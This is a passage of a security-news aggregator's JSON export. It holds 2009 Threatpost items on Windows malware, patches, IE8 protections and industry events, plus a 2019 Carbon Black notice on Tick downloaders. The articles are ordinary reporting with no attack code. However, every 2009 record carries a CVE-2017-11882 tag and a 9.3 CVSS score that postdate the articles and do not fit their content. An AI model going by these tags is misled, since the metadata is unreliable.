story](<http://www.computerworld.com/action/article.do?command=viewArticleBasic&articleId=9133240>) [computerworld.com]\n", "cvss3": {}, "published": "2009-05-19T15:38:56", "type": "threatpost", "title": "New Windows netbooks may harbor malware", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-04-17T16:39:14", "id": "THREATPOST:E65917E5AE555B95E6FFBD69E00E682D", "href": "https://threatpost.com/new-windows-netbooks-may-harbor-malware-051909/72668/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:10:05", "description": "[From eWEEK (Brian Prince)](<http://www.eweek.com/c/a/Security/Pirated-Windows-7-Builds-a-Botnet-With-Trojan-456054/>)\n\nAttackers pushing pirated, malware-laced copies of Microsoft\u2019s upcoming Windows 7 operating system have been actively trying to build a botnet.\n\nAccording to researchers at Damballa, attackers hid a Trojan inside of pirated copies of the operating system and began circulating them on BitTorrent sites. Damballa reported that it shut down the botnet\u2019s command and control server May 10, but by that time infection rates had risen as high as 552 users per hour. [Read the full story](<http://www.eweek.com/c/a/Security/Pirated-Windows-7-Builds-a-Botnet-With-Trojan-456054/>) [eweek.com]\n", "cvss3": {}, "published": "2009-05-12T22:23:28", "type": "threatpost", "title": "Pirated Windows 7 builds botnet with Trojan", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-04-17T16:39:12", "id": "THREATPOST:AA7C9EFD06F74FBC5580C0384A39AA56", "href": "https://threatpost.com/pirated-windows-7-builds-botnet-trojan-051209/72691/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:10:10", "description": "\n\nMicrosoft has developed an ultra-secure version of Windows XP, with many settings locked down by default. But the hardened OS isn\u2019t for sale to the general public; it\u2019s made specifically for the military. Microsoft built the secure version of XP a few years ago at the direction of the Air Force, which had grown weary of the constant updates to other Windows versions and had just seen its network defenses abused in a pentration test by the National Security Agency.\n\nIn response, the Air Force went to Microsoft and leaned on the software giant to put together a hardened version of XP, built to the service\u2019s specifications. As Wired.com\u2019s [Threat Level](<http://www.wired.com/threatlevel/2009/04/air-force-windows/>) reports:\n\nThe Air Force persuaded Microsoft CEO Steve Ballmer to provide it with a secure Windows configuration that saved the service about $100 million in contract costs and countless hours of maintenance. At a congressional hearing this week on cybersecurity, Alan Paller, research director of the Sans Institute, shared the story as an template for how the government could use its massive purchasing power to get companies to produce more secure products. And those could eventually be available to the rest of us.\n\nSecurity experts have been arguing for this \u201ctrickle-down\u201d model for years. But rather than wield its buying power for the greater good, the government has long wimped out and taken whatever vendors served them. If the Air Force case is a good judge, however, things might be changing.\n\nVarious government agencies have in fact tried this tactic before, with various levels of success. The [Department of Energy signed a contract with Oracle](<http://www.nytimes.com/2003/09/24/business/technology-briefing-software-oracle-and-energy-dept-increase-software-security.html?n=Top/News/Business/Companies/Oracle%20Corporation>) in 2003 that specified various minimum security settings in the company\u2019s products. Little has been heard of this effort since then, however.\n\nWhile this version was built to the Air Force\u2019s specifications, both home users and IT shops can benefit from the work by applying the [secure configuration settings for Windows XP](<http://csrc.nist.gov/itsec/guidance_WinXP.html>) published by the National Institute of Standards and Technology. The guidelines are step-by-step walkthroughs for locking down machines running XP, and there are similar guides for Windows Vista and other products on the NIST site.\n", "cvss3": {}, "published": "2009-05-01T14:37:52", "type": "threatpost", "title": "Microsoft develops secure Windows XP for military", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-04-17T16:39:05", "id": "THREATPOST:05CA5F0BEDE4AEE08ED1C40F6D413601", "href": "https://threatpost.com/microsoft-develops-secure-windows-xp-military-050109/72775/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:10:14", "description": "If there\u2019s one key message coming through all of the noise at the RSA Conference this week it\u2019s the fact that there\u2019s a pressing need for more data. Data on attacks, data on vulnerabilities, data on data breaches, data on software security, data on everything having to do with security. The mini-movement that has sprung up around metrics and measurement in security has taken over a lot of the conversation at the conference, with some interesting results.\n\nSeveral different panels and talks have addressed the metrics problem from a variety of angles, with the consensus being that there just simply isn\u2019t enough good data available in most parts of the industry. The last few years have seen a marked increase in the amount of data avilable on some topics, especially data breaches, but those are still the exceptions rather than the rule. In a panel Wednesday morning, four experts with disparate backgrounds said that a big part of the problem is that it\u2019s not clear what should be measured or how.\n\nEven Microsoft, which has been looking at this problem for several years, doesn\u2019t have a clear answer. Adam Shostack, a security program manager at Microsoft, said the company has good systems in place for measuring vulnerability counts and patch counts, but is still working on how to get the most out of those numbers.\n\n\u201cThe one thing we know is that our customer would like fewer updates and more secure software,\u201d he said during the panel discussion, which also included Gary McGraw of Cigital, Matt Blaze of the University of Pennsylvania and Elizabeth Nichols of PlexLogic. \u201cThat\u2019s the primary metric that we work off of.\u201d\n\nMcGraw, who has been working on measuring software security and internal software security programs for several years, said that even the organizations doing the best job with those programs have a tough time getting the most out of their measurement efforts. But the key thing is, at least they\u2019re doing the measurements. The vast majority of software makers and other companies that produce their own custom applications aren\u2019t even taking that step.\n\n\u201cA lot of people are selling highly flammable software. There\u2019s no one who isn\u2019t because people don\u2019t know how to build secure software,\u201d Blaze said.\n", "cvss3": {}, "published": "2009-04-22T19:52:40", "type": "threatpost", "title": "Experts call for better measurement of security", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-04-17T16:39:23", "id": "THREATPOST:21439BDD06D57894E0142A06D59463B5", "href": "https://threatpost.com/experts-call-better-measurement-security-042209/72562/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:10:16", "description": "[ \n](<https://threatpost.com/microsoft-unveil-patch-management-metrics-project-041509/>)\n\nMicrosoft on Wednesday plans to launch a new research effort to determine the total cost of the patch-management cycle, from testing and distributing a fix to user deployment of the patch. The end result of the project, which will be completely open and transparent to outsiders, will be a full metrics model that the company plans to make freely available.\n\nThe metrics project will be handled by the analyst firm Securosis, which will do surveys and interviews with end users and will be responsible for building out the model. Rich Mogull, the firm\u2019s founder, said when Microsoft contacted him about the project he was encouraged by the open, product-neutral way in which the company wanted to approach it. \n\n\u201cThis is not a vendor tool. It\u2019s not product-focused at all,\u201d Mogull said. \u201cIt\u2019s focused on the organizations and the end users. We\u2019re looking at the patch management cycle. What are the total costs for the total cycle, from monitoring what you need to patch all the way to getting the patch out.\u201d\n\nAs part of the process, Securosis will be posting all of the correspondence between the firm and Microsoft about the project, inviting other vendors to participate and make suggestions and encouraging users to comment on the project as it progresses. Mogull said he hopes to have the first version of the model finished by the end of June.\n\nThe project is beng driven on Microsoft\u2019s end by Jeff Jones, a strategy director in the company\u2019s Security Technology Unit. Mogull said that he and Jones have talked at length about the transparency and objectivity requirements around the metrics model.\n\n\u201cOur research model is radically transparent and that\u2019s how this is going to be too,\u201d Mogull said. \u201cEverything will be out in the open. I wouldn\u2019t do something like this if it wasn\u2019t. The goal for the project is to produce an objective, independent model, irrespective of Microsoft.\u201d\n\nMogull has created a separate [Web page](<http://securosis.com/projectquant>) to discuss the project, which is where the materials related to the effort will be available once it gets underway. He lists the goals and deliverables of the effort, which he\u2019s calling Project Quant for now, and emphasizes the open and transparent nature of the project.\n\n\u201cAll materials will be made publicly available throughout the project, including internal communications (the Totally Transparent Research process). The model will be developed through a combination of primary research, surveys, focused interviews, and public/community participation,\u201d Mogull writes.\n\n*Composite header image via [Robert Scoble](<http://www.flickr.com/photos/scobleizer/>)\u2018s Flickr photostream\n", "cvss3": {}, "published": "2009-04-15T11:45:37", "type": "threatpost", "title": "Microsoft to unveil patch management metrics project", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-04-17T16:39:21", "id": "THREATPOST:F28846A403C73C488A77B766A21BB3E5", "href": "https://threatpost.com/microsoft-unveil-patch-management-metrics-project-041509/72588/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:10:18", "description": "[From CIO (Robert McMillan)](<http://www.cio.com/article/488842/After_Attacks_Excel_Update_Due_From_Microsoft>)\n\n[](<https://threatpost.com/after-attacks-microsoft-readies-security-patches-040909/>)Corporate IT staffers will get a double whammy next week, as both [Microsoft and Oracle are set to release critical security updates](<http://www.cio.com/article/488842/After_Attacks_Excel_Update_Due_From_Microsoft>) [cio.com] on the same day, including a likely fix for an Excel bug that has been used by cybercriminals.\n\nThis month, Oracle\u2019s quarterly software fixes and Microsoft\u2019s monthly patches happen to fall on the same day, next Tuesday. For Windows users, there will be a lot to patch. Microsoft plans to release [eight updates in total](<http://www.microsoft.com/technet/security/bulletin/ms09-apr.mspx>) [microsoft.com]: Five of them are for Windows, with a single update each for Internet Explorer, Excel and Microsoft\u2019s Internet Security and Acceleration (ISA) server. [Read the full story](<http://www.cio.com/article/488842/After_Attacks_Excel_Update_Due_From_Microsoft>). More from [ZDNet Zero Day](<http://blogs.zdnet.com/security/?p=3116>) [zdnet.com]\n", "cvss3": {}, "published": "2009-04-09T20:27:27", "type": "threatpost", "title": "After attacks, Microsoft readies security patches", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-04-17T16:39:26", "id": "THREATPOST:69A935F9472525B2FDE94FC33D6C6B70", "href": "https://threatpost.com/after-attacks-microsoft-readies-security-patches-040909/72521/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:10:20", "description": "Trojan downloaders and malware that masquerades as security software are the two fastest growing threats on the Web right now, according an analysis by Microsoft\u2019s Malware Protection Center. In its latest [Software Intelligence Report](<http://www.microsoft.com/downloads/details.aspx?FamilyID=aa6e0660-dc24-4930-affd-e33572ccb91f&displaylang=en>), released on Wednesday, the MMPC found that a Trojan downloader named Renos that installs rogue security software was the most prevalent threat in the second half of 2008, increasing by 66 percent.\n\nTrojan downloaders in general have become a major problem as attackers continue to look for new ways to install malware on vulnerable machines. Microsoft found that these threats accounted for more than half of all of the malware removed by its Malicious Software Removal Tool from July through December of last year.\n\n\u201cThe prevalence of rogue security software has increased significantly over the past three periods. Rogue security software uses fear and annoyance tactics to convince victims to pay for \u2018full versions\u2019 of the software in order to remove and protect themselves from malware, to stop the continual alerts and warnings, or both,\u201d the report says.\n\n\n\nMicrosoft pulls the data for the SIR from the results it sees from removals of malware done by the MSRT on millions of PCs, both in the enterprise and in homes. So it\u2019s an interesting data set with a fairly broad sample base.\n\nOne other interesting nugget in the report is that only about 41 percent of browser-based exploits on pre-Vista versions of Windows targeted Microsoft products. On Vista, that number drops to about five percent. And both of those numbers have been going down over time. That\u2019s a trend that bears watching.\n\n_*Graph from Microsoft Security Intelligence Report_\n", "cvss3": {}, "published": "2009-04-08T14:14:09", "type": "threatpost", "title": "Microsoft: Rogue security software fastest-growing online threat", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-04-17T16:39:25", "id": "THREATPOST:8549E725CF51C109F7299A0CC5FACBE9", "href": "https://threatpost.com/microsoft-rogue-security-software-fastest-growing-online-threat-040809/72530/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:10:20", "description": "[](<https://threatpost.com/microsoft-issues-powerpoint-zero-day-warning-040209/>)Microsoft has issued an advisory to warn about an under-attack zero-day vulnerability affecting its PowerPoint software.\n\nAccording to [the pre-patch advisory](<http://www.microsoft.com/technet/security/advisory/969136.mspx>), the flaw allows remote code execution if a user opens a booby-trapped PowerPoint file. The company described the attacks as \u201climited and targeted.\u201d\n\nAffected software:\n\nMicrosoft Office PowerPoint 2000 Service Pack 3 \nMicrosoft Office PowerPoint 2002 Service Pack 3 \nMicrosoft Office PowerPoint 2003 Service Pack 3 \nMicrosoft Office 2004 for Mac\n\nIn the absence of a fix, Microsoft [recommends](<http://www.microsoft.com/technet/security/advisory/969136.mspx>) the following workarounds:\n\n * Do not open or save Office files that you receive from un-trusted sources or that are received unexpectedly from trusted sources.\n * Do not open or save Office files that you receive from un-trusted sources or that are received unexpectedly from trusted sources. This vulnerability could be exploited when a user opens a file.\n * Use the Microsoft Office Isolated Conversion Environment (MOICE) when opening files from unknown or untrusted sources. \n * The Microsoft Office Isolated Conversion Environment (MOICE) will protect Office 2003 installations by more securely opening Word, Excel, and PowerPoint binary format files.\n * Use Microsoft Office File Block policy to block the opening of Office 2003 and earlier documents from unknown or untrusted sources and locations.\n", "cvss3": {}, "published": "2009-04-02T23:35:53", "type": "threatpost", "title": "Microsoft issues PowerPoint zero-day warning", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-04-17T16:39:25", "id": "THREATPOST:A7710EFC5AA842A252861C862A3F8318", "href": "https://threatpost.com/microsoft-issues-powerpoint-zero-day-warning-040209/72535/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:10:24", "description": "[](<https://threatpost.com/ie8-security-stops-memory-bypass-attacks-032609/>)\n\nWhen Mark Dowd and Alex Sotirov demonstrated a technique for [bypassing Vista\u2019s memory protections](<http://taossa.com/archive/bh08sotirovdowd.pdf>) at Black Hat last year, the security community was stunned. Microsoft officials said at the time they were working on ways to defeat the pair\u2019s attack and now that protection has arrived, in the form of Internet Explorer 8.\n\nDowd (above, right), who works for IBM ISS in Australia, says in a blog post that the improvements that Microsoft has made in the [security of IE 8](<http://blogs.iss.net/archive/chicksdigIE8.html>) have the effect of preventing the memory-bypass attacks from working.\n\n\u201cBasically, the fix is simple: Loading .NET controls has been associated with a special privilege that users can enable or disable \u2013 and in the default configuration for the \u201cInternet Zone\u201d (the Medium-High setting), .NET controls have been disabled,\u201d Dowd writes.\n\nThe attack that Dowd and Sotirov (above, left) showed off at Black Hat was complex, but the basic premise is that they were able to load a .Net control onto a Web page into a location of their choosing, and with whatever permissions they chose. This allowed them to get around two of the main memory protections in Windows Vista, ASLR (Address Space Layout Randomization) and DEP (Data Execution Prevention). These two technologies are a major part of the security upgrades that Microsoft added to Vista, and Dowd and Sotirov\u2019s attack was seen as a breakthrough.\n\nBut now, with the addition of the new permission to IE 8, Microsoft has put a stop to that particular attack. As [Jonathan Ness](<http://blogs.technet.com/srd/archive/2009/03/23/released-build-of-internet-explorer-8-blocks-dowd-sotirov-aslr-dep-net-bypass.aspx>) of the Microsoft Security Response Center writes in his blog on IE 8 security, \u201cThe final release of Internet Explorer 8 on Windows Vista blocks the .NET DEP+ASLR bypass mechanism from malicious websites on the Internet. Specifically, IE8 created a new URLAction that regulates loading of the .NET MIME filter. By default, the URLAction prevents it from loading in the Internet and Restricted Sites Zones. The .NET MIME filter is allowed to load by default in the Intranet Zone.\u201d \n\n\n\nThis is a nice advance for Microsoft and for its customers. IE for years has been seen as by far the least secure of the major browsers, but that perception may be shifting now. At last week\u2019s CanSecWest conference, the hackers in the Pwn2Own contest went right after Safari, believing that IE 8 on Vista was too tough to crack. It eventually went down, surprising many of the researchers in attendance.\n\nThis is all to the good, as Dowd writes.\n\n\u201cSo, the net effect (no pun intended) of this change is that by default, our technique will no longer work in its current form against IE8 browsers in their default configuration. There are also a number of other security enhancements in IE8,\u201d he writes. \u201cMost notably, the browser now runs in \u2018Protected Mode.\u2019 Essentially, this means that the browsing process runs in a sandbox of sorts with a restricted set of privileges. (Internally, this is implemented by utilizing Vista\u2019s \u2018Low Integrity\u2019 mode and communicating to a broker process via an out of process COM server. But, that is the topic of another post.) Furthermore, DEP has been enabled in IE8, which is a big change from IE7. This means that IE8 now fully reaps the benefits of the Vista memory protections. Hacking it is going to be hard! .. Probably!\u201d\n", "cvss3": {}, "published": "2009-03-26T18:27:42", "type": "threatpost", "title": "IE8 security stops memory bypass attacks", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-04-17T16:39:25", "id": "THREATPOST:17ABCE7BEBAC56FCA5601686C9601728", "href": "https://threatpost.com/ie8-security-stops-memory-bypass-attacks-032609/72537/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:10:25", "description": "Microsoft has hired yet another well-known security researcher to join its ever-growing team of exploit and defense experts. This time it\u2019s Ken Johnson, known in the hacker world as [Skywing](<http://www.nynaeve.net/>). Johnson is known as an expert on debugging and reverse engineering, and has done a tremendous amount of work [tearing apart Windows defenses](<http://www.uninformed.org/?v=2&a=4>) specifically.\n\nBefore moving to Microsoft, Johnson was working for Positive Networks, a VPN provider. In a [blog post](<http://blogs.msdn.com/michael_howard/archive/2009/03/24/ken-johnson-skywing-joins-microsoft.aspx>) announcing Johnson\u2019s hiring, Microsoft software security guru Mike Howard praised Johnson\u2019s experience and skill. \n\n\u201cKen brings an enormous amount of reverse engineering and defense-subversion skill to Microsoft. Ken will be working on anything and everything related vulnerabilities, exploits, defenses, bypassing defenses and more,\u201d Howard said.\n\nJohnson\u2019s hiring is the latest in a series of interesting personnel moves for Microsoft\u2019s security group. The changes essentially began about three years ago when Adam Shostack joined Microsoft. Shostack is a well-known security and privacy expert and had spent years in start-ups and smaller organizations and was not afraid to be critical of Microsoft\u2019s policies. \n\n\u201cIn the past, I\u2019ve [heaped scorn](<http://www.securityfocus.com/news/315>) on Microsoft\u2019s security related decisions. Over the last few years, I\u2019ve watched Microsoft embrace security. I\u2019ve watched them make very large investments in security, including hiring my friends and colleagues. And really, I\u2019ve watched them produce results,\u201d Shostack wrote in a [blog post at the time of his hiring at Microsoft](<http://www.emergentchaos.com/archives/2006/06/im_joining_microsoft.html>). \n\nThen in January 2008 Microsoft hired Crispin Cowan, an expert on Linux and open-source security and was the brains behind the Immunix security-enhanced Linux distribution. And a few months later Matt Miller joined Microsoft, as well. Known as [Skape](<http://hick.org/~mmiller/>), Miller was a big part of HD Moore\u2019s [Metasploit Project](<http://metasploit.org/>) team and is known for his work on exploitation techniques.\n\nGiven the emphasis that Microsoft has placed on anti-exploitation and memory protection in its most recent releases, including Vista and Internet Explorer 8, it stands to reason that the company will continue to bring in more of the people who have done work on the other side of that fence. There\u2019s no defense like a good offense. \n", "cvss3": {}, "published": "2009-03-25T15:27:43", "type": "threatpost", "title": "Ken \"Skywing\" Johnson joins Microsoft security team", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-04-17T16:39:29", "id": "THREATPOST:088C4C91495F7C7262D861A66DC74B85", "href": "https://threatpost.com/ken-skywing-johnson-joins-microsoft-security-team-032509/72482/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:10:26", "description": "[By Robert Westervelt, SearchSecurity.com](<http://searchsecurity.techtarget.com/news/article/0,289142,sid14_gci1351376,00.html?track=sy160>)\n\n[](<https://threatpost.com/internet-explorer-8-includes-bevy-security-features-032009/>)Microsoft has officially released [Internet Explorer 8 today](<http://www.microsoft.com/windows/internet-explorer/default.aspx>) [microsoft.com] with a number of new security features to improve privacy and protect against phishing and cross-site-scripting attacks. [From the article](<http://searchsecurity.techtarget.com/news/article/0,289142,sid14_gci1351376,00.html?track=sy160>):\n\nMicrosoft is trying to mitigate some of the common issues with a cross-site-scripting (XSS) filter, which protects against Type-1 XSS attacks. The filter in IE 8 monitors all of the requests and responses made by the browser and automatically disables XSS attacks when they\u2019re detected. When an attack is blocked, users will be alerted with a modified version of the requested page. The browser also has a built-in feature that analyzes URL strings and highlights the top-level domain in the address bar to prevent a person being victimized by website spoofing.\n\nAnd more:\n\nMicrosoft also addressed the growing need for privacy while browsing certain websites. A new feature called InPrivate browsing mode, enables users to control whether IE saves a record of their browsing session. Similar to the Incognito mode in Google\u2019s Chrome browser, InPrivate in IE 8 won\u2019t save cookies, passwords, browsing history or any other record if it is enabled. Microsoft said InPrivate also prevents form data, passwords and temporary Internet files from being stored, keeping the session completely private.\n\nIE 8 also includes a feature to block clickjacking attacks, preventing users from clicking an obscured or hidden Web element. The feature detects a website header designed by Web developers that declares how many frames a sensitive Web page can contain. Microsoft says the technique is not perfect, but will substantially mitigate the threat of clickjacking on sensitive websites.\n\nRead [the full article](<http://searchsecurity.techtarget.com/news/article/0,289142,sid14_gci1351376,00.html?track=sy160>) [techtarget].\n", "cvss3": {}, "published": "2009-03-20T17:17:02", "type": "threatpost", "title": "Internet Explorer 8 includes a bevy of security features", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-04-17T16:39:37", "id": "THREATPOST:215398BCE165265631436077B4E79ECB", "href": "https://threatpost.com/internet-explorer-8-includes-bevy-security-features-032009/72388/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:10:27", "description": "[](<https://threatpost.com/cansecwest-caution-community-play-031909/>)\n\nCanSecWest, in beautiful Vancouver BC, is one of my favorite conferences each year. It\u2019s a cozy little security con that brings together security researchers from all parts of the security ecosystem. Like a [PhNeutral](<http://ph-neutral.darklab.org/>) or a [BlueHat](<http://technet.microsoft.com/en-us/security/cc261637.aspx>), one never quite knows what to expect out of a CanSecWest, but we do know that Microsoft products and engineers will play a prominent role. We\u2019ll be presenting new security innovations and new tools, we\u2019ll be watching Pwn2Own closely for possible hacks, and we\u2019ll be happy to discuss our industry best practices in the hallway track.\n\nSecurity gatherings such as this allow the ecosystem to exchange information and awareness in order to become more secure. The more we know about the attacks, the better prepared we can be on defense. Presentations like Matt Miller\u2019s \u201cThe Evolution of Microsoft\u2019s Exploit Mitigations\u201d and Jason Shirk and Dave Weinstein\u2019s \u201cAutomated Real-time and Post Mortem Security Crash Analysis and Categorization\u201d demonstrate that as Microsoft learns more about an attack, we incorporate this information into techniques and tools that we share with our developer community. Stay tuned for more news and posts throughout the show.\n\n**[ SEE: **[**Android, iPhone security under scrutiny at CanSecWest**](<https://threatpost.com/android-iphone-security-under-scrutiny-cansecwest-031809/>)** ]**\n\nAgain this year, [CanSecWest features the Pwn2Own contest](<http://cansecwest.com/post/2009-03-18-01:00:00.PWN2OWN_Final_Rules>) \u2013 a contest that pits researchers against technologies to see whether technology or human wins. It\u2019s also a contest that presents interesting challenges to Microsoft and a contest which you might think Microsoft opposes. Like many other issues in the security ecosystem \u2013 it\u2019s not that simple. The contest exemplifies two basic tenets behind the TwC Security teams\u2019 efforts. You can\u2019t hide from the truth (wishing doesn\u2019t make it so) and every issue is an opportunity to learn and improve.\n\nWe recognize that all vendors\u2019 products may be found vulnerable and Microsoft welcomes the contest as another opportunity to engage the security community in productive dialogue around responsible disclosure and effective security engineering. We also see that Pwn2Own provides an opportunity to educate the public and we believe it can showcase Microsoft\u2019s security engineering efforts, both relative to our competitors and in an absolute sense.\n\n**[ SEE: [Pwn2Own trifecta: Hacker exploits IE8, Firefox, Safari](<https://threatpost.com/pwn2own-trifecta-hacker-exploits-ie8-firefox-safari-031809/>) ]**\n\nThe security community is offering knowledge of attacks and defenses that consumers and other vendors can use to stay safe or create more secure products. The rest of the story \u2013 and an additional measure the security community could use to evaluate vendors\u2019 products \u2013 is what happens after the content ends. Rest assured Microsoft will take this information and apply it towards securing our networks, platforms and applications (hopefully before they ship), and to create strong response process and engineering discipline that are necessary for our communal security. And as always, the MSRC are ready to work to investigate any vulnerabilities that researchers might find during the Pwn2Own contest.\n\n**[ SEE: **[**Paul Roberts: Mobile security can no longer be ignored**](<https://threatpost.com/mobile-security-can-no-longer-be-ignored-031809/>)** ]**\n\nBy the end of the contest, co-sponsor [Tipping Point](<http://www.zerodayinitiative.com/about/>) will be the owners of many new vulnerabilities. They value the protection of their customers and will need to work with their partners in the security ecosystem to make sure everybody is protected as quickly as possible (one more way consumers benefit). One of the goals of responsible disclosure is for the vulnerability details to emerge at the same time that an update is available from the vulnerable vendor. The CanSecWest conference organizer also has a responsible disclosure policy, as do all of the conference organizers that the EcoStrat team is able to support worldwide each year.\n\nAlthough innovative contests put some of us in a place that is not always comfortable, it\u2019s valuable for the ecosystem to come together with contests like Pwn2Own and Iron Chef Black Hat, to better understand and solve common issues. It\u2019s yet another example of the \u201cteam of rivals\u201d strategy. Let the contest begin!\n\n_* Sarah Blankinship is a senior security strategist lead in Microsoft\u2019s Ecosystem Strategy team._\n", "cvss3": {}, "published": "2009-03-19T15:40:46", "type": "threatpost", "title": "CanSecWest: Caution, community at play", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-05-03T18:00:20", "id": "THREATPOST:9B11E0EF22481CA407924C58E8C7F8C1", "href": "https://threatpost.com/cansecwest-caution-community-play-031909/72396/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:10:28", "description": "[](<https://threatpost.com/should-microsoft-be-security-business-031909/>)\n\nGartner security analyst Neil MacDonald thinks [there are five levels to the discussion](<http://blogs.gartner.com/neil_macdonald/2009/03/18/should-microsoft-be-in-the-security-business/>) [gartner.com] about whether Microsoft should be in the security business. They include secure coding (obviously), secure functionality in the platform at no cost (of course), add-on security products at a fee (maybe) and paid cloud-based security services (sure).\n\nRead [the full blog post and take a stab at the questions](<http://blogs.gartner.com/neil_macdonald/2009/03/18/should-microsoft-be-in-the-security-business/>) MacDonald poses.\n\nImage [via Wonderlane](<http://www.flickr.com/photos/wonderlane/1378294362/>) (Flickr CC 2.0)\n", "cvss3": {}, "published": "2009-03-19T15:18:05", "type": "threatpost", "title": "Should Microsoft be in the security business?", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-04-17T16:39:36", "id": "THREATPOST:A9FAA9D15FCD97151072CF8CE16A42D9", "href": "https://threatpost.com/should-microsoft-be-security-business-031909/72395/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "carbonblack": [{"lastseen": "2019-12-11T13:20:10", "description": "Trend Micro released a white paper about Tick, a Chinese cyberespionage threat actor targeting east asian countries. The report details several new downloader malware families. VMware Carbon Black Threat Analysis Unit (TAU) reviewed the malware and is providing product rules to detect and identify the malware.\n\n## Behavior Summary\n\nThe Trend Micro report stated that the downloaders were deployed by using right to left override (RTLO) technique or exploiting the CVE-2018-0802 and CVE-2018-0798 vulnerabilities. The downloaders have code which is used to detect antivirus products.\n\n\n\nThe CB ThreatHunter process diagram shows the downloader activity after it is deployed by the dropper. As the dropper just sets the persistence, rebooting is required to run.__\n\nAdditionally, CB Defense will display the malware\u2019s overall triggered TTPs.\n\n__\n\nTo learn more, [click here.](<https://community.carbonblack.com/t5/Threat-Research-Docs/TAU-TIN-Tick-downloaders-Operation-ENDTRADE/ta-p/83641>)\n\nThe post [Threat Analysis Unit (TAU) Threat Intelligence Notification: Tick Downloaders (Operation ENDTRADE)](<https://www.carbonblack.com/2019/12/10/threat-analysis-unit-tau-threat-intelligence-notification-tick-downloaders-operation-endtrade/>) appeared first on [VMware Carbon Black](<https://www.carbonblack.com>).", "edition": 2, "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 5.9}, "published": "2019-12-10T15:34:53", "type": "carbonblack", "title": "Threat Analysis Unit (TAU) Threat Intelligence Notification: Tick Downloaders (Operation ENDTRADE)", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-0798", "CVE-2018-0802"], "modified": "2019-12-10T15:34:53", "id": "CARBONBLACK:5FC3EC6D315A733A8D566BD7A42A12FE", "href": "https://www.carbonblack.com/2019/12/10/threat-analysis-unit-tau-threat-intelligence-notification-tick-downloaders-operation-endtrade/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-03-19T21:36:32", "description": "The global COVID-19 pandemic is generating a substantial uptick in the production and delivery of Coronavirus themed malware. Due to a rapidly growing number of Indicators of 